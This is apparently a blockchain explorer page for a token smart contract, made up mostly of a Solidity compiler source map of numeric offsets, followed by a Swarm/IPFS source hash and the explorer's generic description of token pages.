13878:5440:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14146:28;;;;;;;;;160:25:1;;;148:2;133:18;14146:28:0;;;;;;;;14788:91;;;:::i;:::-;;;;;;;:::i;15823:210::-;;;;;;:::i;:::-;;:::i;:::-;;;1351:14:1;;1344:22;1326:41;;1314:2;1299:18;15823:210:0;1186:187:1;15089:108:0;15177:12;;15089:108;;16233:455;;;;;;:::i;:::-;;:::i;14990:91::-;15064:9;;14990:91;;15064:9;;;;1853:36:1;;1841:2;1826:18;14990:91:0;1711:184:1;16696:302:0;;;;;;:::i;:::-;;:::i;18018:203::-;;;;;;:::i;:::-;;:::i;:::-;;15205:177;;;;;;:::i;:::-;-1:-1:-1;;;;;15356:18:0;15324:7;15356:18;;;:9;:18;;;;;;;15205:177;5671:94;;;:::i;5020:87::-;5066:7;5093:6;-1:-1:-1;;;;;5093:6:0;5020:87;;;-1:-1:-1;;;;;2675:32:1;;;2657:51;;2645:2;2630:18;5020:87:0;2511:203:1;14887:95:0;;;:::i;15390:216::-;;;;;;:::i;:::-;;:::i;14181:21::-;;;;;-1:-1:-1;;;;;14181:21:0;;;15614:201;;;;;;:::i;:::-;-1:-1:-1;;;;;15780:18:0;;;15748:7;15780:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15614:201;5920:192;;;;;;:::i;:::-;;:::i;14788:91::-;14833:13;14866:5;14859:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14788:91;:::o;15823:210::-;15942:4;15964:39;3818:10;15987:7;15996:6;15964:8;:39::i;:::-;-1:-1:-1;16021:4:0;15823:210;;;;;:::o;16233:455::-;16373:4;16390:36;16400:6;16408:9;16419:6;16390:9;:36::i;:::-;16437:221;16460:6;3818:10;16508:139;16564:6;16508:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16508:19:0;;;;;;:11;:19;;;;;;;;3818:10;16508:33;;;;;;;;;;:37;:139::i;:::-;16437:8;:221::i;:::-;-1:-1:-1;16676:4:0;16233:455;;;;;:::o;16696:302::-;3818:10;16811:4;16905:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16905:34:0;;;;;;;;;;16811:4;;16833:133;;16883:7;;16905:50;;16944:10;16905:38;:50::i;18018:203::-;16113:15;;-1:-1:-1;;;;;16113:15:0;3818:10;16113:31;16090:105;;;;-1:-1:-1;;;16090:105:0;;;;;;;:::i;:::-;;;;;;;;;18121:6:::1;:14:::0;;-1:-1:-1;;;;;18121:14:0;;::::1;-1:-1:-1::0;;;;;;18121:14:0;;::::1;::::0;::::1;::::0;;18146:13:::1;:23:::0;;;18121:6:::1;18180:17:::0;;;18121:14;18180:17:::1;::::0;;;;:33;-1:-1:-1;18018:203:0:o;5671:94::-;5066:7;5093:6;-1:-1:-1;;;;;5093:6:0;3818:10;5240:23;5232:68;;;;-1:-1:-1;;;5232:68:0;;;;;;;:::i;:::-;5736:21:::1;5754:1;5736:9;:21::i;:::-;5671:94::o:0;14887:95::-;14934:13;14967:7;14960:14;;;;;:::i;15390:216::-;15512:4;15534:42;3818:10;15558:9;15569:6;15534:9;:42::i;5920:192::-;5066:7;5093:6;-1:-1:-1;;;;;5093:6:0;3818:10;5240:23;5232:68;;;;-1:-1:-1;;;5232:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;6009:22:0;::::1;6001:73;;;::::0;-1:-1:-1;;;6001:73:0;;3932:2:1;6001:73:0::1;::::0;::::1;3914:21:1::0;3971:2;3951:18;;;3944:30;4010:34;3990:18;;;3983:62;-1:-1:-1;;;4061:18:1;;;4054:36;4107:19;;6001:73:0::1;3730:402:1::0;6001:73:0::1;6085:19;6095:8;6085:9;:19::i;:::-;5920:192:::0;:::o;18694:382::-;-1:-1:-1;;;;;18830:19:0;;18822:69;;;;-1:-1:-1;;;18822:69:0;;4339:2:1;18822:69:0;;;4321:21:1;4378:2;4358:18;;;4351:30;4417:34;4397:18;;;4390:62;-1:-1:-1;;;4468:18:1;;;4461:35;4513:19;;18822:69:0;4137:401:1;18822:69:0;-1:-1:-1;;;;;18910:21:0;;18902:69;;;;-1:-1:-1;;;18902:69:0;;4745:2:1;18902:69:0;;;4727:21:1;4784:2;4764:18;;;4757:30;4823:34;4803:18;;;4796:62;-1:-1:-1;;;4874:18:1;;;4867:33;4917:19;;18902:69:0;4543:399:1;18902:69:0;-1:-1:-1;;;;;18984:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19036:32;;160:25:1;;;19036:32:0;;133:18:1;19036:32:0;;;;;;;;18694:382;;;:::o;17006:613::-;-1:-1:-1;;;;;17146:20:0;;17138:71;;;;-1:-1:-1;;;17138:71:0;;5149:2:1;17138:71:0;;;5131:21:1;5188:2;5168:18;;;5161:30;5227:34;5207:18;;;5200:62;-1:-1:-1;;;5278:18:1;;;5271:36;5324:19;;17138:71:0;4947:402:1;17138:71:0;-1:-1:-1;;;;;17228:23:0;;17220:72;;;;-1:-1:-1;;;17220:72:0;;5556:2:1;17220:72:0;;;5538:21:1;5595:2;5575:18;;;5568:30;5634:34;5614:18;;;5607:62;-1:-1:-1;;;5685:18:1;;;5678:34;5729:19;;17220:72:0;5354:400:1;17220:72:0;17385:109;17421:6;17385:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17385:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17365:17:0;;;;;;;:9;:17;;;;;;:129;;;;17528:20;;;;;;;:32;;17553:6;17528:24;:32::i;:::-;-1:-1:-1;;;;;17505:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17576:35;;;;;;;;;;17604:6;160:25:1;;148:2;133:18;;14:177;11385:240:0;11505:7;11566:12;11558:6;;;;11550:29;;;;-1:-1:-1;;;11550:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11601:5:0;;;11385:240::o;9106:98::-;9164:7;9191:5;9195:1;9191;:5;:::i;:::-;9184:12;9106:98;-1:-1:-1;;;9106:98:0:o;6120:173::-;6176:16;6195:6;;-1:-1:-1;;;;;6212:17:0;;;-1:-1:-1;;;;;;6212:17:0;;;;;;6245:40;;6195:6;;;;;;;6245:40;;6176:16;6245:40;6165:128;6120:173;:::o;196:548:1:-;308:4;337:2;366;355:9;348:21;398:6;392:13;441:6;436:2;425:9;421:18;414:34;466:1;476:140;490:6;487:1;484:13;476:140;;;585:14;;;581:23;;575:30;551:17;;;570:2;547:26;540:66;505:10;;476:140;;;480:3;665:1;660:2;651:6;640:9;636:22;632:31;625:42;735:2;728;724:7;719:2;711:6;707:15;703:29;692:9;688:45;684:54;676:62;;;;196:548;;;;:::o;749:173::-;817:20;;-1:-1:-1;;;;;866:31:1;;856:42;;846:70;;912:1;909;902:12;846:70;749:173;;;:::o;927:254::-;995:6;1003;1056:2;1044:9;1035:7;1031:23;1027:32;1024:52;;;1072:1;1069;1062:12;1024:52;1095:29;1114:9;1095:29;:::i;:::-;1085:39;1171:2;1156:18;;;;1143:32;;-1:-1:-1;;;927:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:415::-;1974:6;1982;1990;2043:2;2031:9;2022:7;2018:23;2014:32;2011:52;;;2059:1;2056;2049:12;2011:52;2098:9;2085:23;2151:5;2144:13;2137:21;2130:5;2127:32;2117:60;;2173:1;2170;2163:12;2117:60;2196:5;-1:-1:-1;2248:2:1;2233:18;;2220:32;;-1:-1:-1;2271:38:1;2305:2;2290:18;;2271:38;:::i;:::-;2261:48;;1900:415;;;;;:::o;2320:186::-;2379:6;2432:2;2420:9;2411:7;2407:23;2403:32;2400:52;;;2448:1;2445;2438:12;2400:52;2471:29;2490:9;2471:29;:::i;2719:260::-;2787:6;2795;2848:2;2836:9;2827:7;2823:23;2819:32;2816:52;;;2864:1;2861;2854:12;2816:52;2887:29;2906:9;2887:29;:::i;:::-;2877:39;;2935:38;2969:2;2958:9;2954:18;2935:38;:::i;:::-;2925:48;;2719:260;;;;;:::o;2984:380::-;3063:1;3059:12;;;;3106;;;3127:61;;3181:4;3173:6;3169:17;3159:27;;3127:61;3234:2;3226:6;3223:14;3203:18;3200:38;3197:161;;3280:10;3275:3;3271:20;3268:1;3261:31;3315:4;3312:1;3305:15;3343:4;3340:1;3333:15;3197:161;;2984:380;;;:::o;3369:356::-;3571:2;3553:21;;;3590:18;;;3583:30;3649:34;3644:2;3629:18;;3622:62;3716:2;3701:18;;3369:356::o;5759:222::-;5824:9;;;5845:10;;;5842:133;;;5897:10;5892:3;5888:20;5885:1;5878:31;5932:4;5929:1;5922:15;5960:4;5957:1;5950:15
Swarm Source
ipfs://30c66de74b6f01cd146e1240fcd87b7baab74b779da6f85c596c42770a36dec8
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.